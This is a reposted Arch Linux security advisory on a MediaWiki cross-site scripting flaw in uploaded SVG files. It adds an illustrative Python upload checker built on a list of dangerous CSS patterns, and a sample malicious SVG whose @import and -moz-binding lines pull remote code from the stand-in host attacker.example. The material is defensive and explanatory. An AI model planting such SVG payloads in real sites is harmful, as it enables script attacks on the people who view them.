ArchLinux: 201409-4: mediawiki: Cross-site Scripting (XSS)

    Date: 29 Sep 2014
    Category: ArchLinux
    Posted By: LinuxSecurity Advisories
    The package mediawiki before version 1.23.4-1 is vulnerable to Cross-site Scripting (XSS).
    Arch Linux Security Advisory ASA-201409-4
    =========================================
    
    Severity: High
    Date    : 2014-09-29
    CVE-ID  : CVE-2014-7199
    Package : mediawiki
    Type    : Cross-site Scripting (XSS)
    Remote  : Yes
    Link    : https://wiki.archlinux.org/index.php/CVE-2014
    
    Summary
    =======
    
    The package mediawiki before version 1.23.4-1 is
    vulnerable to Cross-site Scripting (XSS).
    
    Resolution
    ==========
    
    Upgrade to 1.23.4-1.
    
    # pacman -Syu "mediawiki>=1.23.4-1"
    
    The problem has been fixed upstream in version 1.23.4.
    
    Workaround
    ==========
    
    None.
    
    Description
    ===========
    
    It was discovered that MediaWiki, a wiki engine, did not sufficiently
    filter CSS in uploaded SVG files (both <style> elements and style
    attributes), allowing for cross-site scripting when the file is
    rendered inline by a viewer's browser.
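    The check an upload handler needs here, as an added example that is
    not MediaWiki's own code nor the upstream fix: reject any SVG whose
    CSS could pull in a remote resource or evaluate script. The patterns
    flagged (@import, non-data: url(), expression(), -moz-binding,
    behavior:) are the usual suspects for this class of bug and are an
    assumption of the example, as are the sample files and the
    attacker.example hostname, which are constructed here.

```python
import re
import xml.etree.ElementTree as ET

# CSS constructs that can fetch a remote resource or run script when an
# SVG is rendered inline by a browser. This list is an assumption of the
# example, not a quotation of MediaWiki's filter.
FORBIDDEN_CSS = [
    re.compile(r"@import", re.I),
    re.compile(r"expression\s*\(", re.I),
    re.compile(r"-moz-binding", re.I),
    re.compile(r"behavior\s*:", re.I),
]
# url(...) is allowed only with a data: URI (embedded fonts/images);
# anything else is a cross-origin fetch the wiki does not control.
URL_RE = re.compile(r"url\s*\(\s*['\"]?\s*([^'\")\s]*)", re.I)


def css_is_dangerous(css: str) -> bool:
    """True if a CSS fragment contains a construct we refuse to serve.

    Deliberately conservative: text inside CSS comments also counts,
    so a commented-out @import still rejects the upload.
    """
    for pat in FORBIDDEN_CSS:
        if pat.search(css):
            return True
    for m in URL_RE.finditer(css):
        if not m.group(1).strip().lower().startswith("data:"):
            return True
    return False


def find_dangerous_css(svg_bytes: bytes) -> list:
    """Return one finding per <style> element or style= attribute that
    css_is_dangerous() rejects; an empty list means the CSS is clean."""
    root = ET.fromstring(svg_bytes)
    findings = []
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()   # drop the XML namespace
        if tag == "style" and el.text and css_is_dangerous(el.text):
            findings.append(f"<style> element: {el.text.strip()[:60]}")
        style_attr = el.attrib.get("style")
        if style_attr and css_is_dangerous(style_attr):
            findings.append(f"style attribute on <{tag}>: {style_attr[:60]}")
    return findings


# Constructed sample uploads (not from the advisory or the bug report).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<style>@font-face{font-family:f;src:url(data:font/woff;base64,AAAA)} .a{fill:red}</style>
<rect class="a" width="10" height="10" style="stroke:blue"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<style>@import url("http://attacker.example/x.css");</style>
<rect width="10" height="10" style="-moz-binding:url(http://attacker.example/x.xml#b)"/>
</svg>"""


if __name__ == "__main__":
    for name, data in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        hits = find_dangerous_css(data)
        print(name, "REJECT" if hits else "accept", hits)
```

    This covers only the CSS vector named in the advisory; a real upload
    checker must separately reject <script> elements, on* event-handler
    attributes and external href targets, and should parse untrusted XML
    with entity expansion disabled (e.g. defusedxml) rather than the
    bare stdlib parser used here for brevity.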
    
    Impact
    ======
    
    A remote attacker is able to upload a crafted SVG file to perform a
    cross-site scripting attack against users who view it. Exploitation
    requires an account permitted to upload files on a wiki configured
    to accept SVG uploads; MediaWiki ships with uploads disabled and with
    svg absent from the default $wgFileExtensions list.
    
    References
    ==========
    
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7199
    https://bugzilla.wikimedia.org/show_bug.cgi?id=69008
    https://bugs.archlinux.org/task/42161
    https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-September/000161.html
    
    